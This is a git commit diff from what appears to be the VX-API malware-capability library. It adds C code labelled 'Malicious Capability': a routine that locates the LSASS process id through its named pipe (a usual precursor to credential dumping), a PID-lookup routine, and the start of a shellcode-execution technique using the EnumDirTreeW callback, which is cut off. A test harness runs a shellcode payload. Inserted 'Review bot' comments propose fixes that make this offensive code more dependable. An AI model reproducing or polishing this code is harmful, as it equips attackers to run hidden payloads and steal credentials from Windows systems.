mirror of https://github.com/vxunderground/VX-API
new malcode + fixes
This commit is contained in:
parent
8138d0abe1
commit
24f69a35ba
@ -3,7 +3,7 @@ managed by [vx-underground](https://vx-underground.org) | follow us on [Twitter]
|
||||
# VX-API
|
||||
|
||||
Version: 2.0.252
|
||||
Version: 2.0.266
|
||||
|
||||
Developer: smelly__vx
|
||||
|
||||
|
@ -131,6 +131,7 @@ You're free to use this in any manner you please. You do not need to use this en
| UacBypassFodHelperMethod | winscripting.blog | Malicious Capability |
|
||||
| MpfGetLsaPidFromServiceManager | modexp | Malicious Capability |
|
||||
| MpfGetLsaPidFromRegistry | modexp | Malicious Capability |
|
||||
| MpfGetLsaPidFromNamedPipe | modexp | Malicious Capability |
|
||||
| ShellcodeExecViaCertEnumSystemStore | alfarom256 and aahmad097| Malicious Capability |
|
||||
| ShellcodeExecViaCDefFolderMenu_Create2 | alfarom256 and aahmad097| Malicious Capability |
|
||||
| ShellcodeExecViaCertEnumSystemStoreLocation | alfarom256 and aahmad097| Malicious Capability |
|
||||
|
@ -139,6 +140,7 @@ You're free to use this in any manner you please. You do not need to use this en
| ShellcodeExecViaEnumDateFormatsW | alfarom256 and aahmad097| Malicious Capability |
|
||||
| ShellcodeExecViaEnumDesktopsW | alfarom256 and aahmad097| Malicious Capability |
|
||||
| ShellcodeExecViaEnumDesktopWindows | alfarom256 and aahmad097| Malicious Capability |
|
||||
| ShellcodeExecViaEnumDirTreeW | alfarom256 and aahmad097| Malicious Capability |
|
||||
|
||||
|
||||
# Todo list
|
||||
@ -19,6 +19,7 @@ typedef NTSTATUS(NTAPI* NTQUERYINFORMATIONFILE)(HANDLE, PIO_STATUS_BLOCK, PVOID,
typedef NTSTATUS(NTAPI* NTOPENFILE)(PHANDLE, ACCESS_MASK, POBJECT_ATTRIBUTES, PIO_STATUS_BLOCK, ULONG, ULONG);
|
||||
typedef BOOL(NTAPI* RTLDOSPATHNAMETONTPATHNAME_U)(PCWSTR, PUNICODE_STRING, PCWSTR*, PRTL_RELATIVE_NAME_U);
|
||||
typedef NTSTATUS(NTAPI* NTCREATEFILE)(PHANDLE, ACCESS_MASK, POBJECT_ATTRIBUTES, PIO_STATUS_BLOCK, PLARGE_INTEGER, ULONG, ULONG, ULONG, ULONG, PVOID, ULONG);
|
||||
typedef NTSTATUS(NTAPI* NTFSCONTROLFILE)(HANDLE, HANDLE, PIO_APC_ROUTINE, PVOID, PIO_STATUS_BLOCK, ULONG, PVOID, ULONG, PVOID, ULONG);
|
||||
|
||||
|
||||
|
||||
|
@ -95,4 +96,13 @@ typedef BOOL(WINAPI* CERTENUMSYSTEMSTORE)(DWORD, PVOID, PVOID, PFN_CERT_ENUM_SYS
typedef BOOL(WINAPI* CERTENUMSYSTEMSTORELOCATION)(DWORD, PVOID, PFN_CERT_ENUM_SYSTEM_STORE_LOCATION);
|
||||
typedef HCERTSTORE(WINAPI* CERTOPENSTORE)(LPCSTR, DWORD, HCRYPTPROV_LEGACY, DWORD, PVOID);
|
||||
typedef PCCERT_CHAIN_CONTEXT(WINAPI* CERTFINDCHAININSTORE)(HCERTSTORE, DWORD, DWORD, DWORD, PVOID, PCCERT_CHAIN_CONTEXT);
|
||||
typedef BOOL(WINAPI* CERTCLOSESTORE)(HCERTSTORE, DWORD);
|
||||
typedef BOOL(WINAPI* CERTCLOSESTORE)(HCERTSTORE, DWORD);
|
||||
|
||||
|
||||
|
||||
/*******************************************
|
||||
DBGHELP IMPORT
|
||||
*******************************************/
|
||||
typedef BOOL(WINAPI* SYMINITIALIZEW)(HANDLE, PCWSTR, BOOL);
|
||||
typedef BOOL(WINAPI* SYMCLEANUP)(HANDLE);
|
||||
typedef BOOL(WINAPI* ENUMDIRTREEW)(HANDLE, PCWSTR, PCWSTR, PWSTR, LPVOID, PVOID);
@ -0,0 +1,194 @@
#include "Win32Helper.h"
|
||||
|
||||
DWORD GetPidFromPidBruteForcingExW(_In_ PWCHAR ProcessNameWithExtension)
|
||||
{
|
||||
UNICODE_STRING NtfsRoot = { 0 };
|
||||
IO_STATUS_BLOCK IoBlock = { 0 };
|
||||
HANDLE hDevice = NULL;
|
||||
OBJECT_ATTRIBUTES Attributes = { 0 };
|
||||
HMODULE hModule = NULL, hShlwapi = NULL;
|
||||
PFILE_PROCESS_IDS_USING_FILE_INFORMATION ProcessIdArray = NULL;
|
||||
NTSTATUS Status = STATUS_SUCCESS;
|
||||
DWORD ProcessId = ERROR_SUCCESS, dwProcessInformationListArrayLength = 16384;
|
||||
|
||||
NTCREATEFILE NtCreateFile = NULL;
|
||||
NTCLOSE NtClose = NULL;
|
||||
NTQUERYINFORMATIONFILE NtQueryInformationFile = NULL;
|
||||
NTQUERYSYSTEMINFORMATION NtQuerySystemInformation = NULL;
|
||||
PATHSTRIPPATHW PathStripPathW = NULL;
|
||||
|
||||
hModule = GetModuleHandleEx2W(L"ntdll.dll");
|
||||
hShlwapi = TryLoadDllMultiMethodW((PWCHAR)L"shlwapi.dll");
|
||||
|
||||
if (!hModule || !hShlwapi)
|
||||
return 0;
|
||||
|
||||
NtCreateFile = (NTCREATEFILE)GetProcAddressA((DWORD64)hModule, "NtCreateFile");
|
||||
NtClose = (NTCLOSE)GetProcAddressA((DWORD64)hModule, "NtClose");
|
||||
NtQueryInformationFile = (NTQUERYINFORMATIONFILE)GetProcAddressA((DWORD64)hModule, "NtQueryInformationFile");
|
||||
NtQuerySystemInformation = (NTQUERYSYSTEMINFORMATION)GetProcAddressA((DWORD64)hModule, "NtQuerySystemInformation");
|
||||
PathStripPathW = (PATHSTRIPPATHW)GetProcAddressA((DWORD64)hShlwapi, "PathStripPathW");
|
||||
if (!NtCreateFile || !NtClose || !NtQueryInformationFile || !NtQuerySystemInformation || !PathStripPathW)
|
||||
return 0;
|
||||
|
||||
RtlInitUnicodeString(&NtfsRoot, L"\\NTFS\\");
|
||||
|
||||
InitializeObjectAttributes(&Attributes, &NtfsRoot, OBJ_CASE_INSENSITIVE, NULL, NULL);
|
||||
|
||||
Status = NtCreateFile(&hDevice, GENERIC_READ | SYNCHRONIZE, &Attributes, &IoBlock, NULL, FILE_ATTRIBUTE_NORMAL, FILE_SHARE_READ, FILE_OPEN, 0, NULL, 0);
|
||||
if (!NT_SUCCESS(Status))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
ProcessIdArray = (PFILE_PROCESS_IDS_USING_FILE_INFORMATION)HeapAlloc(GetProcessHeapFromTeb(), HEAP_ZERO_MEMORY, dwProcessInformationListArrayLength);
|
||||
if (ProcessIdArray == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
ZeroMemory(&IoBlock, sizeof(IO_STATUS_BLOCK));
|
||||
|
||||
Status = NtQueryInformationFile(hDevice, &IoBlock, ProcessIdArray, dwProcessInformationListArrayLength, FileProcessIdsUsingFileInformation);
|
||||
if (!NT_SUCCESS(Status))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
for (DWORD dwX = 0; dwX < ProcessIdArray->NumberOfProcessIdsInList; dwX++)
|
||||
{
|
||||
WCHAR ImageName[MAX_PATH * sizeof(WCHAR)] = { 0 };
|
||||
SYSTEM_PROCESS_IMAGE_NAME_INFORMATION SystemProcessInformation = { 0 };
|
||||
|
||||
if (ProcessId != ERROR_SUCCESS)
|
||||
break;
|
||||
|
||||
#pragma warning( push )
|
||||
#pragma warning( disable : 4244)
|
||||
SystemProcessInformation.ProcessId = LongToHandle(ProcessIdArray->ProcessIdList[dwX]);
|
||||
#pragma warning( pop )
|
||||
SystemProcessInformation.ImageName.Buffer = ImageName;
|
||||
SystemProcessInformation.ImageName.Length = 0;
|
||||
SystemProcessInformation.ImageName.MaximumLength = sizeof(ImageName);
|
||||
|
||||
Status = NtQuerySystemInformation(SystemProcessIdInformation, &SystemProcessInformation, sizeof(SystemProcessInformation), NULL);
|
||||
if (!NT_SUCCESS(Status))
|
||||
continue;
|
||||
|
||||
if (SystemProcessInformation.ImageName.Buffer == NULL)
|
||||
continue;
|
||||
|
||||
PathStripPathW(SystemProcessInformation.ImageName.Buffer);
|
||||
|
||||
#pragma warning( push )
|
||||
#pragma warning( disable : 4244)
|
||||
if (StringCompareW(ProcessNameWithExtension, SystemProcessInformation.ImageName.Buffer) == ERROR_SUCCESS)
|
||||
ProcessId = ProcessIdArray->ProcessIdList[dwX];
|
||||
#pragma warning( pop )
|
||||
}
|
||||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
if (ProcessIdArray)
|
||||
HeapFree(GetProcessHeapFromTeb(), HEAP_ZERO_MEMORY, ProcessIdArray);
|
||||
|
||||
if (hDevice)
|
||||
NtClose(hDevice);
|
||||
|
||||
if (hShlwapi)
|
||||
FreeLibrary(hShlwapi);
|
||||
|
||||
return ProcessId;
|
||||
}
|
||||
|
||||
DWORD GetPidFromPidBruteForcingExA(_In_ PCHAR ProcessNameWithExtension)
|
||||
{
|
||||
UNICODE_STRING NtfsRoot = { 0 };
|
||||
IO_STATUS_BLOCK IoBlock = { 0 };
|
||||
HANDLE hDevice = NULL;
|
||||
OBJECT_ATTRIBUTES Attributes = { 0 };
|
||||
HMODULE hModule = NULL, hShlwapi = NULL;
|
||||
PFILE_PROCESS_IDS_USING_FILE_INFORMATION ProcessIdArray = NULL;
|
||||
NTSTATUS Status = STATUS_SUCCESS;
|
||||
DWORD ProcessId = ERROR_SUCCESS, dwProcessInformationListArrayLength = 16384;
|
||||
WCHAR ProcessParameterTransformed[MAX_PATH * sizeof(WCHAR)] = { 0 };
|
||||
NTCREATEFILE NtCreateFile = NULL;
|
||||
NTCLOSE NtClose = NULL;
|
||||
NTQUERYINFORMATIONFILE NtQueryInformationFile = NULL;
|
||||
NTQUERYSYSTEMINFORMATION NtQuerySystemInformation = NULL;
|
||||
PATHSTRIPPATHW PathStripPathW = NULL;
|
||||
|
||||
if (CharStringToWCharString(ProcessParameterTransformed, ProcessNameWithExtension, StringLengthA(ProcessNameWithExtension) == 0))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
hModule = GetModuleHandleEx2W(L"ntdll.dll");
|
||||
hShlwapi = TryLoadDllMultiMethodW((PWCHAR)L"shlwapi.dll");
|
||||
|
||||
if (!hModule || !hShlwapi)
|
||||
return 0;
|
||||
|
||||
NtCreateFile = (NTCREATEFILE)GetProcAddressA((DWORD64)hModule, "NtCreateFile");
|
||||
NtClose = (NTCLOSE)GetProcAddressA((DWORD64)hModule, "NtClose");
|
||||
NtQueryInformationFile = (NTQUERYINFORMATIONFILE)GetProcAddressA((DWORD64)hModule, "NtQueryInformationFile");
|
||||
NtQuerySystemInformation = (NTQUERYSYSTEMINFORMATION)GetProcAddressA((DWORD64)hModule, "NtQuerySystemInformation");
|
||||
PathStripPathW = (PATHSTRIPPATHW)GetProcAddressA((DWORD64)hShlwapi, "PathStripPathW");
|
||||
if (!NtCreateFile || !NtClose || !NtQueryInformationFile || !NtQuerySystemInformation || !PathStripPathW)
|
||||
return 0;
|
||||
|
||||
RtlInitUnicodeString(&NtfsRoot, L"\\NTFS\\");
|
||||
|
||||
InitializeObjectAttributes(&Attributes, &NtfsRoot, OBJ_CASE_INSENSITIVE, NULL, NULL);
|
||||
|
||||
Status = NtCreateFile(&hDevice, GENERIC_READ | SYNCHRONIZE, &Attributes, &IoBlock, NULL, FILE_ATTRIBUTE_NORMAL, FILE_SHARE_READ, FILE_OPEN, 0, NULL, 0);
|
||||
if (!NT_SUCCESS(Status))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
ProcessIdArray = (PFILE_PROCESS_IDS_USING_FILE_INFORMATION)HeapAlloc(GetProcessHeapFromTeb(), HEAP_ZERO_MEMORY, dwProcessInformationListArrayLength);
|
||||
if (ProcessIdArray == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
ZeroMemory(&IoBlock, sizeof(IO_STATUS_BLOCK));
|
||||
|
||||
Status = NtQueryInformationFile(hDevice, &IoBlock, ProcessIdArray, dwProcessInformationListArrayLength, FileProcessIdsUsingFileInformation);
|
||||
if (!NT_SUCCESS(Status))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
for (DWORD dwX = 0; dwX < ProcessIdArray->NumberOfProcessIdsInList; dwX++)
|
||||
{
|
||||
WCHAR ImageName[MAX_PATH * sizeof(WCHAR)] = { 0 };
|
||||
SYSTEM_PROCESS_IMAGE_NAME_INFORMATION SystemProcessInformation = { 0 };
|
||||
|
||||
if (ProcessId != ERROR_SUCCESS)
|
||||
break;
|
||||
|
||||
#pragma warning( push )
|
||||
#pragma warning( disable : 4244)
|
||||
SystemProcessInformation.ProcessId = LongToHandle(ProcessIdArray->ProcessIdList[dwX]);
|
||||
#pragma warning( pop )
|
||||
SystemProcessInformation.ImageName.Buffer = ImageName;
|
||||
SystemProcessInformation.ImageName.Length = 0;
|
||||
SystemProcessInformation.ImageName.MaximumLength = sizeof(ImageName);
|
||||
|
||||
Status = NtQuerySystemInformation(SystemProcessIdInformation, &SystemProcessInformation, sizeof(SystemProcessInformation), NULL);
|
||||
if (!NT_SUCCESS(Status))
|
||||
continue;
|
||||
|
||||
if (SystemProcessInformation.ImageName.Buffer == NULL)
|
||||
continue;
|
||||
|
||||
PathStripPathW(SystemProcessInformation.ImageName.Buffer);
|
||||
|
||||
#pragma warning( push )
|
||||
#pragma warning( disable : 4244)
|
||||
if (StringCompareW(ProcessParameterTransformed, SystemProcessInformation.ImageName.Buffer) == ERROR_SUCCESS)
|
||||
ProcessId = ProcessIdArray->ProcessIdList[dwX];
|
||||
#pragma warning( pop )
|
||||
}
|
||||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
if (ProcessIdArray)
|
||||
HeapFree(GetProcessHeapFromTeb(), HEAP_ZERO_MEMORY, ProcessIdArray);
|
||||
|
||||
if (hDevice)
|
||||
NtClose(hDevice);
|
||||
|
||||
if (hShlwapi)
|
||||
FreeLibrary(hShlwapi);
|
||||
|
||||
return ProcessId;
|
||||
}
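Review bot: In GetPidFromPidBruteForcingExA the closing parenthesis of the length guard is misplaced: `CharStringToWCharString(ProcessParameterTransformed, ProcessNameWithExtension, StringLengthA(ProcessNameWithExtension) == 0)` passes the result of the comparison (0 or 1) as what appears to be the length argument, so at most one character is ever converted and the `goto EXIT_ROUTINE` is driven by the helper's return value rather than by the empty-string test; the intended line is presumably `if (CharStringToWCharString(ProcessParameterTransformed, ProcessNameWithExtension, StringLengthA(ProcessNameWithExtension)) == 0)` (confirm the helper's return convention before changing it). Both the W and A functions also `return 0` from the DLL-load and GetProcAddress checks while hShlwapi may already have been loaded by TryLoadDllMultiMethodW, so those early returns skip the FreeLibrary that EXIT_ROUTINE performs; routing them through `goto EXIT_ROUTINE` keeps cleanup in one place. The `HEAP_ZERO_MEMORY` flag passed to HeapFree is not a HeapFree flag and is ignored; passing `0` states the intent.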
@ -1,96 +0,0 @@
#include "Win32Helper.h"
|
||||
|
||||
DWORD GetPidFromPidBruteForcingExW(_In_ PWCHAR ProcessNameWithExtension)
|
||||
{
|
||||
UNICODE_STRING NtfsRoot = { 0 };
|
||||
IO_STATUS_BLOCK IoBlock = { 0 };
|
||||
HANDLE hDevice = NULL;
|
||||
OBJECT_ATTRIBUTES Attributes = { 0 };
|
||||
HMODULE hModule = NULL, hShlwapi = NULL;
|
||||
PFILE_PROCESS_IDS_USING_FILE_INFORMATION ProcessIdArray = NULL;
|
||||
NTSTATUS Status = STATUS_SUCCESS;
|
||||
DWORD ProcessId = ERROR_SUCCESS, dwProcessInformationListArrayLength = 16384;
|
||||
|
||||
NTCREATEFILE NtCreateFile = NULL;
|
||||
NTCLOSE NtClose = NULL;
|
||||
NTQUERYINFORMATIONFILE NtQueryInformationFile = NULL;
|
||||
NTQUERYSYSTEMINFORMATION NtQuerySystemInformation = NULL;
|
||||
PATHSTRIPPATHW PathStripPathW = NULL;
|
||||
|
||||
hModule = GetModuleHandleEx2W(L"ntdll.dll");
|
||||
hShlwapi = TryLoadDllMultiMethodW((PWCHAR)L"shlwapi.dll");
|
||||
|
||||
if (!hModule || !hShlwapi)
|
||||
return 0;
|
||||
|
||||
NtCreateFile = (NTCREATEFILE)GetProcAddressA((DWORD64)hModule, "NtCreateFile");
|
||||
NtClose = (NTCLOSE)GetProcAddressA((DWORD64)hModule, "NtClose");
|
||||
NtQueryInformationFile = (NTQUERYINFORMATIONFILE)GetProcAddressA((DWORD64)hModule, "NtQueryInformationFile");
|
||||
NtQuerySystemInformation = (NTQUERYSYSTEMINFORMATION)GetProcAddressA((DWORD64)hModule, "NtQuerySystemInformation");
|
||||
PathStripPathW = (PATHSTRIPPATHW)GetProcAddressA((DWORD64)hShlwapi, "PathStripPathW");
|
||||
if (!NtCreateFile || !NtClose || !NtQueryInformationFile || !NtQuerySystemInformation || !PathStripPathW)
|
||||
return 0;
|
||||
|
||||
RtlInitUnicodeString(&NtfsRoot, L"\\NTFS\\");
|
||||
|
||||
InitializeObjectAttributes(&Attributes, &NtfsRoot, OBJ_CASE_INSENSITIVE, NULL, NULL);
|
||||
|
||||
Status = NtCreateFile(&hDevice, GENERIC_READ | SYNCHRONIZE, &Attributes, &IoBlock, NULL, FILE_ATTRIBUTE_NORMAL, FILE_SHARE_READ, FILE_OPEN, 0, NULL, 0);
|
||||
if (!NT_SUCCESS(Status))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
ProcessIdArray = (PFILE_PROCESS_IDS_USING_FILE_INFORMATION)HeapAlloc(GetProcessHeapFromTeb(), HEAP_ZERO_MEMORY, dwProcessInformationListArrayLength);
|
||||
if (ProcessIdArray == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
ZeroMemory(&IoBlock, sizeof(IO_STATUS_BLOCK));
|
||||
|
||||
Status = NtQueryInformationFile(hDevice, &IoBlock, ProcessIdArray, dwProcessInformationListArrayLength, FileProcessIdsUsingFileInformation);
|
||||
if (!NT_SUCCESS(Status))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
for (DWORD dwX = 0; dwX < ProcessIdArray->NumberOfProcessIdsInList; dwX++)
|
||||
{
|
||||
WCHAR ImageName[MAX_PATH * sizeof(WCHAR)] = { 0 };
|
||||
SYSTEM_PROCESS_IMAGE_NAME_INFORMATION SystemProcessInformation = { 0 };
|
||||
|
||||
if (ProcessId != ERROR_SUCCESS)
|
||||
break;
|
||||
|
||||
#pragma warning( push )
|
||||
#pragma warning( disable : 4244)
|
||||
SystemProcessInformation.ProcessId = LongToHandle(ProcessIdArray->ProcessIdList[dwX]);
|
||||
#pragma warning( pop )
|
||||
SystemProcessInformation.ImageName.Buffer = ImageName;
|
||||
SystemProcessInformation.ImageName.Length = 0;
|
||||
SystemProcessInformation.ImageName.MaximumLength = sizeof(ImageName);
|
||||
|
||||
Status = NtQuerySystemInformation(SystemProcessIdInformation, &SystemProcessInformation, sizeof(SystemProcessInformation), NULL);
|
||||
if (!NT_SUCCESS(Status))
|
||||
continue;
|
||||
|
||||
if (SystemProcessInformation.ImageName.Buffer == NULL)
|
||||
continue;
|
||||
|
||||
PathStripPathW(SystemProcessInformation.ImageName.Buffer);
|
||||
|
||||
#pragma warning( push )
|
||||
#pragma warning( disable : 4244)
|
||||
if (StringCompareW(ProcessNameWithExtension, SystemProcessInformation.ImageName.Buffer) == ERROR_SUCCESS)
|
||||
ProcessId = ProcessIdArray->ProcessIdList[dwX];
|
||||
#pragma warning( pop )
|
||||
}
|
||||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
if (ProcessIdArray)
|
||||
HeapFree(GetProcessHeapFromTeb(), HEAP_ZERO_MEMORY, ProcessIdArray);
|
||||
|
||||
if (hDevice)
|
||||
NtClose(hDevice);
|
||||
|
||||
if (hShlwapi)
|
||||
FreeLibrary(hShlwapi);
|
||||
|
||||
return ProcessId;
|
||||
}
@ -31,6 +31,34 @@
#define FILE_OVERWRITE_IF 0x00000005
|
||||
#define FILE_MAXIMUM_DISPOSITION 0x00000005
|
||||
|
||||
#define FSCTL_PIPE_ASSIGN_EVENT CTL_CODE(FILE_DEVICE_NAMED_PIPE, 0, METHOD_BUFFERED, FILE_ANY_ACCESS)
|
||||
#define FSCTL_PIPE_DISCONNECT CTL_CODE(FILE_DEVICE_NAMED_PIPE, 1, METHOD_BUFFERED, FILE_ANY_ACCESS)
|
||||
#define FSCTL_PIPE_LISTEN CTL_CODE(FILE_DEVICE_NAMED_PIPE, 2, METHOD_BUFFERED, FILE_ANY_ACCESS)
|
||||
#define FSCTL_PIPE_PEEK CTL_CODE(FILE_DEVICE_NAMED_PIPE, 3, METHOD_BUFFERED, FILE_READ_DATA)
|
||||
#define FSCTL_PIPE_QUERY_EVENT CTL_CODE(FILE_DEVICE_NAMED_PIPE, 4, METHOD_BUFFERED, FILE_ANY_ACCESS)
|
||||
#define FSCTL_PIPE_TRANSCEIVE CTL_CODE(FILE_DEVICE_NAMED_PIPE, 5, METHOD_NEITHER, FILE_READ_DATA | FILE_WRITE_DATA)
|
||||
#define FSCTL_PIPE_WAIT CTL_CODE(FILE_DEVICE_NAMED_PIPE, 6, METHOD_BUFFERED, FILE_ANY_ACCESS)
|
||||
#define FSCTL_PIPE_IMPERSONATE CTL_CODE(FILE_DEVICE_NAMED_PIPE, 7, METHOD_BUFFERED, FILE_ANY_ACCESS)
|
||||
#define FSCTL_PIPE_SET_CLIENT_PROCESS CTL_CODE(FILE_DEVICE_NAMED_PIPE, 8, METHOD_BUFFERED, FILE_ANY_ACCESS)
|
||||
#define FSCTL_PIPE_QUERY_CLIENT_PROCESS CTL_CODE(FILE_DEVICE_NAMED_PIPE, 9, METHOD_BUFFERED, FILE_ANY_ACCESS)
|
||||
#define FSCTL_PIPE_GET_PIPE_ATTRIBUTE CTL_CODE(FILE_DEVICE_NAMED_PIPE, 10, METHOD_BUFFERED, FILE_ANY_ACCESS)
|
||||
#define FSCTL_PIPE_SET_PIPE_ATTRIBUTE CTL_CODE(FILE_DEVICE_NAMED_PIPE, 11, METHOD_BUFFERED, FILE_ANY_ACCESS)
|
||||
#define FSCTL_PIPE_GET_CONNECTION_ATTRIBUTE CTL_CODE(FILE_DEVICE_NAMED_PIPE, 12, METHOD_BUFFERED, FILE_ANY_ACCESS)
|
||||
#define FSCTL_PIPE_SET_CONNECTION_ATTRIBUTE CTL_CODE(FILE_DEVICE_NAMED_PIPE, 13, METHOD_BUFFERED, FILE_ANY_ACCESS)
|
||||
#define FSCTL_PIPE_GET_HANDLE_ATTRIBUTE CTL_CODE(FILE_DEVICE_NAMED_PIPE, 14, METHOD_BUFFERED, FILE_ANY_ACCESS)
|
||||
#define FSCTL_PIPE_SET_HANDLE_ATTRIBUTE CTL_CODE(FILE_DEVICE_NAMED_PIPE, 15, METHOD_BUFFERED, FILE_ANY_ACCESS)
|
||||
#define FSCTL_PIPE_FLUSH CTL_CODE(FILE_DEVICE_NAMED_PIPE, 16, METHOD_BUFFERED, FILE_WRITE_DATA)
|
||||
|
||||
#define FSCTL_PIPE_INTERNAL_READ CTL_CODE(FILE_DEVICE_NAMED_PIPE, 2045, METHOD_BUFFERED, FILE_READ_DATA)
|
||||
#define FSCTL_PIPE_INTERNAL_WRITE CTL_CODE(FILE_DEVICE_NAMED_PIPE, 2046, METHOD_BUFFERED, FILE_WRITE_DATA)
|
||||
#define FSCTL_PIPE_INTERNAL_TRANSCEIVE CTL_CODE(FILE_DEVICE_NAMED_PIPE, 2047, METHOD_NEITHER, FILE_READ_DATA | FILE_WRITE_DATA)
|
||||
#define FSCTL_PIPE_INTERNAL_READ_OVFLOW CTL_CODE(FILE_DEVICE_NAMED_PIPE, 2048, METHOD_BUFFERED, FILE_READ_DATA)
|
||||
|
||||
// Flags for query event
|
||||
|
||||
#define FILE_PIPE_READ_DATA 0x00000000
|
||||
#define FILE_PIPE_WRITE_SPACE 0x00000001
|
||||
|
||||
typedef struct _LSA_UNICODE_STRING {
|
||||
USHORT Length;
|
||||
USHORT MaximumLength;
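Review bot: The new FSCTL_PIPE_* and FILE_PIPE_* definitions reproduce names that the kernel-mode DDK header ntifs.h also defines, and they are added without any guard, so a translation unit that ever includes both would get redefinition warnings or errors. Wrapping the block in `#ifndef FSCTL_PIPE_ASSIGN_EVENT` … `#endif` (or guarding each name individually) keeps Internal.h safe to combine with the SDK copy. A one-line comment naming where the values come from, e.g. `// Named-pipe FSCTL codes and query-event flags, mirrored from ntifs.h`, would let the next reader verify them without guessing.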
|
||||
|
@ -1097,4 +1125,6 @@ typedef struct _RTL_RELATIVE_NAME_U{
typedef struct _FILE_PROCESS_IDS_USING_FILE_INFORMATION{
|
||||
ULONG NumberOfProcessIdsInList;
|
||||
ULONG_PTR ProcessIdList[1];
|
||||
} FILE_PROCESS_IDS_USING_FILE_INFORMATION, * PFILE_PROCESS_IDS_USING_FILE_INFORMATION;
|
||||
} FILE_PROCESS_IDS_USING_FILE_INFORMATION, * PFILE_PROCESS_IDS_USING_FILE_INFORMATION;
|
||||
|
||||
typedef VOID(NTAPI* PIO_APC_ROUTINE)(PVOID ApcContext, _In_ PIO_STATUS_BLOCK IoStatusBlock, _In_ ULONG Reserved);
@ -47,7 +47,9 @@ int main(VOID)
Sei.Payload = GlobalOpenCalcPayload;
|
||||
Sei.dwLengthOfPayloadInBytes = 277;
|
||||
|
||||
ShellcodeExecViaEnumDesktopsW(&Sei);
|
||||
//ShellcodeExecViaEnumDirTreeW(&Sei);
|
||||
|
||||
dwError = MpfGetLsaPidFromNamedPipe();
|
||||
|
||||
return dwError;
|
||||
}
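Review bot: `dwError = MpfGetLsaPidFromNamedPipe();` stores a process id in the variable that main returns as its exit code, while the callee as defined in this commit reports failure as -1 before the pipe is opened and as 0 afterwards, so the driver's exit status becomes a PID on success and an ambiguous sentinel otherwise; keeping `dwError` for status and a separate `DWORD dwLsaPid` for the result, or mapping the sentinel to an error code before `return dwError;`, keeps the exit code meaningful. The line `//ShellcodeExecViaEnumDirTreeW(&Sei);` replaces the previous live call with commented-out code; either delete it or restore the call rather than leaving dead code in the harness. main begins outside the hunk.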
|
||||
@ -0,0 +1,47 @@
#include "Win32Helper.h"
|
||||
|
||||
DWORD MpfGetLsaPidFromNamedPipe(VOID)
|
||||
{
|
||||
UNICODE_STRING Pipe = { 0 };
|
||||
NTOPENFILE NtOpenFile = NULL;
|
||||
NTFSCONTROLFILE NtfsControlFile = NULL;
|
||||
NTCLOSE NtClose = NULL;
|
||||
HMODULE hModule = NULL;
|
||||
IO_STATUS_BLOCK IoBlock = { 0 };
|
||||
OBJECT_ATTRIBUTES Attributes = { 0 };
|
||||
DWORD ProcessId = ERROR_SUCCESS;
|
||||
HANDLE hHandle = INVALID_HANDLE_VALUE;
|
||||
NTSTATUS Status = STATUS_SUCCESS;
|
||||
LPSTR InputBuffer = (LPSTR)"ServerProcessId";
|
||||
|
||||
hModule = TryLoadDllMultiMethodW((PWCHAR)L"ntdll.dll");
|
||||
if (hModule == NULL)
|
||||
return -1;
|
||||
|
||||
NtOpenFile = (NTOPENFILE)GetProcAddressA((DWORD64)hModule, "NtOpenFile");
|
||||
NtfsControlFile = (NTFSCONTROLFILE)GetProcAddressA((DWORD64)hModule, "NtFsControlFile");
|
||||
NtClose = (NTCLOSE)GetProcAddressA((DWORD64)hModule, "NtClose");
|
||||
|
||||
if (!NtOpenFile || !NtfsControlFile || !NtClose)
|
||||
return -1;
|
||||
|
||||
RtlInitUnicodeString(&Pipe, L"\\Device\\NamedPipe\\lsass");
|
||||
|
||||
InitializeObjectAttributes(&Attributes, &Pipe, OBJ_CASE_INSENSITIVE, 0, NULL);
|
||||
|
||||
Status = NtOpenFile(&hHandle, FILE_READ_ATTRIBUTES, &Attributes, &IoBlock, FILE_SHARE_READ, NULL);
|
||||
if (!NT_SUCCESS(Status))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
Status = NtfsControlFile(hHandle, NULL, NULL, NULL, &IoBlock, FSCTL_PIPE_GET_PIPE_ATTRIBUTE, InputBuffer, (ULONG)StringLengthA(InputBuffer) + 1, &ProcessId, sizeof(DWORD));
|
||||
if (!NT_SUCCESS(Status))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
if (hHandle)
|
||||
NtClose(hHandle);
|
||||
|
||||
return ProcessId;
|
||||
}
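Review bot: `hHandle` is initialised to `INVALID_HANDLE_VALUE` but the cleanup tests `if (hHandle)`, and (HANDLE)-1 is non-zero, so when NtOpenFile fails the EXIT_ROUTINE path hands the pseudo-handle value to `NtClose`; initialising with `HANDLE hHandle = NULL;` makes the existing check correct, assuming NtOpenFile leaves the output untouched on failure as NT APIs normally do. `hModule` from TryLoadDllMultiMethodW is never released, whereas ShellcodeExecViaEnumDirTreeW in the same commit pairs that loader with FreeLibrary and the GetPidFromPidBruteForcingEx* routines resolve ntdll through GetModuleHandleEx2W instead; this file mixes the two conventions, and either FreeLibrary in EXIT_ROUTINE or switching to GetModuleHandleEx2W would settle it. Failure is also signalled two ways, -1 from the early returns and 0 (the initial ERROR_SUCCESS of ProcessId) from the goto paths, so callers cannot treat the return uniformly; one sentinel, documented above the function, would help.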
@ -0,0 +1,55 @@
#include "Win32Helper.h"
|
||||
|
||||
DWORD UnusedSubroutineDisposeableThreadEnumDirTreeW(LPVOID Param)
|
||||
{
|
||||
PSHELLCODE_EXECUTION_INFORMATION Sei = (PSHELLCODE_EXECUTION_INFORMATION)Param;
|
||||
SYMINITIALIZEW SymInitialize = NULL;
|
||||
SYMCLEANUP SymCleanup = NULL;
|
||||
ENUMDIRTREEW EnumDirTree = NULL;
|
||||
LPVOID BinAddress = NULL;
|
||||
BOOL bFlag = FALSE;
|
||||
HMODULE hModule = NULL;
|
||||
WCHAR DisposeableBuffer[512] = { 0 };
|
||||
|
||||
